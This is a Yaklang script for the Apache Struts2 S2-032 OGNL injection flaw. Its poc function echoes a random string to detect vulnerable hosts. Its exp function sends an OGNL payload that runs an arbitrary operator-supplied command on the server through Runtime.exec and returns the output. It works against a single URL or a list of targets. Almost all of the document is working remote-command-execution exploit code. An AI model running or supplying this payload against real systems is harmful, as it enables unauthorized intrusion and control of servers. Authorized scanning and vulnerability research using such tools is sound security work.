
def exp(url,cmd){

    payload = `method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=`+cmd+`&pp=\\\\A&ppp=%20&encoding=UTF-8`


    
    req, err = http.Post(
            url,
            http.useragent(http.uarand()),
            http.header("Content-Type","application/x-www-form-urlencoded"),
            http.body(payload),
            )
    if err != nil {
        return
    }

    rsp_data = http.GetAllBody(req)
    println(string(rsp_data))
}

def poc(url){
    random_str = randstr(8)
    // log.info(random_str)
    payload = `method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23w%3d%23context.get(%23parameters.rpsobj[0]),%23w.getWriter().println(`+ random_str +`),%23w.getWriter().flush(),%23w.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse`


    req, err = http.Post(
            url,
            http.useragent(http.uarand()),
            http.header("Content-Type","application/x-www-form-urlencoded"),
            http.body(payload),
            )
    if err != nil {
        return
    }

    rsp_data = http.GetAllBody(req)
    if re.Match(random_str,rsp_data){
        log.warn(url + " S2_032 found !!!")
    }else{
        log.debug(url + " S2_032 safe !!!")
    }

    // println(string(rsp_data))

}




if YAK_MAIN {
    loglevel("info")
    u = cli.String("u")
    file = cli.LineDict("f")
    cmd = cli.String("cmd")

    if u == "" && len(file)<1 {
        log.info("you need input target -u or -f")
        return
    }

    if u != ""{
        if cmd != ""{
            exp(u,cmd)
        }else{
            poc(u)
        }
        return
    }

    for _,u = range file {
         if cmd != "" {
            exp(u,cmd)
        }else{
            poc(u)
        }
    }

}